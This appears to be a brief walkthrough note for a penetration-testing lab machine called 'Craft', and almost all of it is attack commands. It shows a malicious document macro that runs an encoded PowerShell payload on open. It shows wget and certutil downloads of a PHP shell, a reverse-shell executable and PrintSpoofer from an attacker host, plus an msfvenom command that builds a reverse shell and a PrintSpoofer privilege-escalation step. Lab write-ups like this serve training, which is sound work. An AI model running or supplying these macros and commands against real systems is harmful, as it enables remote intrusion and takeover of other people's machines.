Craft

Host:

192.168.212.169

80

Sub Main
    Shell("cmd /c powershell -e JABjAGwAaQBlAG4Ad...ABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA")
End Sub

Then we can configure it to open on document open:

wget http://192.168.45.236/shell.php -o shell.php

and make a reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=3001 -f exe -o shell.exe
wget http://192.168.45.236/shell.exe -o shell.exe

We can use PrintSpoofer:

certutil -urlcache -f http://192.168.45.236/PrintSpoofer64.exe PrintSpoofer64.exe
PrintSpoofer.exe -i -c powershell.exe

Last updated